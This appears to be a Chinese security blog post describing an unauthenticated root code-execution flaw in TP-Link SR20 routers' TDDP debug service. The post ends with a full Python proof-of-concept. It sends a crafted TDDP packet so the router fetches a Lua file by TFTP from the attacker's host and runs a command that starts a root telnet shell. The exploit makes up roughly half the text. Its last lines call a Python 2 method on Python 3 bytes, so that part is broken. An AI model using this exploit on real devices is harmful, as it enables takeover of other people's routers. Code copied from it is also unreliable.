TP-Link SR20 路由器远程代码执行 0day(含PoC)

释放双眼,带上耳机,听听看~!
TP-LinkSR20智能家居路由器和集线器(及其它相关TP-Link智能设备)正遭受任意代码执行漏洞(ACE)的威胁,此漏洞允许内网攻击者以root权限执行任意命令。该漏洞被Google安全开发人员MatthewGarrett于本月27号在Twitter上公布。公布的原因是他去年12月份将相关

TP-Link SR20智能家居路由器和集线器(及其它相关TP-Link智能设备)正遭受任意代码执行漏洞(ACE)的威胁,此漏洞允许内网攻击者以root权限执行任意命令。

该漏洞被Google安全开发人员Matthew Garrett于本月27号在Twitter上公布。公布的原因是他去年12月份将相关漏洞报告提交给TP-Link(相关网站提示1~3日回复)后没有收到任何回复。由于该漏洞接收平台漏洞详情描述字段限制500字不能提供完整的漏洞报告他又在几周后通过推特联系相关负责人亦没有任何回复。

0day允许攻击者以root身份执行任意代码,他在Twitter中解释,0day来自此前已经被发现多个漏洞的TP-Link调试协议“TDDP”。TDDP允许在设备上执行两种类型的命令:不需要身份验证和需要管理员身份验证。

不需要身份验证的更容易遭受黑客攻击,它允许很多类型的命令执行,其中一个命令是0x1F,请求0x01 -(好像是某个配置验证),允许攻击者发送包括文件名、分号和参数的命令来启动进程。

TP-Link路由器通过普通文件传输协议(TFTP)向机器发送特制请求。一旦连接到攻击者的机器,SR20智能集线器通过TFTP请求文件名,将其导入LUA解释器并将参数传递给刚导入的文件中的config_test()函数。解释器以root身份运行。接下来,os.execute()将允许未经身份验证的攻击者以root身份执行任何命令,从而完全控制TP-Link SR20设备。

有兴趣的同学可以下载SR20二进制固件研究下,地址如下:

https://www.tp-link.com/us/support/download/sr20/#Firmware

POC:

#!/usr/bin/python3

# Create /testfile in your tftp root directory with the following contents:
#
#function config_test(config)
#  os.execute("telnetd -l /bin/login.sh")
#end
#
# Replace 192.168.0.1 with the IP address of the vulnerable device

import binascii
import socket

port_send = 1040
port_receive = 61000

tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 00

tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])

sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))

# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
packet = packet + b"/testfile;arbitrary"
print(packet)
sock_send.sendto(packet, ("192.168.0.1", port_send))
sock_send.close()

response, addr = sock_receive.recvfrom(1024)
r = response.encode('hex')
print(r)

参考链接:

1.https://www.coresecurity.com/advisories/tp-link-tddp-multiple-vulnerabilities

2.https://blog.senr.io/blog/cve-2017-9466-why-is-my-router-blinking-morse-code

3.https://www.tp-link.com/us/press/security-advisory/

4.https://mjg59.dreamwidth.org/51672.html

文章最后更新于 2021-07-11

给TA买糖
共{{data.count}}人
人已赞赏
安全工具终端安全

Cobalt Strike 证书修改

2019-3-4 1:44:23

安全工具终端安全

解决微信0day上线CobaltStike的几个问题

2021-4-21 11:07:00

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索